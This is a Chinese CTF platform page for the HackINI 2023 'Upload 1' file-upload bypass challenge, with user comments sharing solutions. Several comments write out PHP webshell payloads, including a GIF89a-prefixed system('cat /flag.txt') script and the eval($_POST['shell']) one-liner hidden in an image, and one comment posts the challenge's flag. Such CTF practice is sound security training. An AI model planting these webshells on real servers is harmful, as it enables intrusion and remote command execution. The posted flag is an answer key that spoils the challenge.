Upload 1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: 18718578940
一血奖励: 0金币
解  决: 743
提  示:
描  述:
We added a verification. Bypass it. **Author**: souad
评论
chouchou 1年前

编写一个php文件 GIF89a <?php echo "<pre>"; system('cat /flag.txt'); echo "</pre>"; #@eval($_POST['s']); ?> 先绕过对php的检查,然后再php中执行shell

回复 0

pb9231 1年前

尝试上传图片文件,发现可以上传(图片要小), 用010 editor 打开图片将php一句话木马<?php @eval($_POST['shell']);?>写入图片末尾,保存后修改图片扩展名为.php 上传图片成功,用蚁剑连接,在根目录下找到flag.txt

回复 0
vanfor 1年前

@TheShy师傅 内容太长了被过滤掉了

回复 0

TheShy师傅 1年前

为什么我一上传就显示页面丢失,什么都不返回给我?无论是什么免杀木马都不行?

回复 1

cqy123 1年前

上传了一个很小的图片,然后抓包,图片内容的头不要动,后面加入一句话木马,乙箭链接

回复 0

.⎛⎝•̀ω•́⎠⎞. 1年前

改改文件头就行

回复 0

ekkoyu 1年前

?的,只能上传一个小小的图片?

回复 0

FADogeCTF 1年前

制作图片马,直接以php文件上传就可以连接webshell

回复 0

868954104 1年前

shellmates{PoLyg10t_F1l3s_Byp4$S} GIF89a <?php system('cat /flag.txt')?>

回复 0

lolthis223 2年前

直接在你的php函数上面加一个GIF89a就可以上传了

回复 1

不会编程的崽 2年前

File too large, this service is meant for small files only 这图片要求的多小啊

回复 0

tcstwz 2年前

也可以加文件头

回复 0

WriteUp

image
yangbo

2 金币

评分(1)

解题动态

星期日 攻破了该题 20小时前
18042157087 攻破了该题 2天前
鸡小哲 攻破了该题 2天前
solomom 攻破了该题 2天前
Muchan 攻破了该题 3天前
18270753375 攻破了该题 4天前
momonga 攻破了该题 7天前
caocao 攻破了该题 7天前
Linkbag 攻破了该题 7天前
minz 攻破了该题 8天前
ndaygril 攻破了该题 9天前
rancol 攻破了该题 9天前
6973lb 攻破了该题 13天前
qq892670825 攻破了该题 14天前
19204144246 攻破了该题 14天前
SZCX 攻破了该题 15天前
折海 攻破了该题 17天前
lmz123 攻破了该题 17天前
鸟兽兽提交点堵flag来 攻破了该题 17天前
张伯伦 攻破了该题 17天前
问题反馈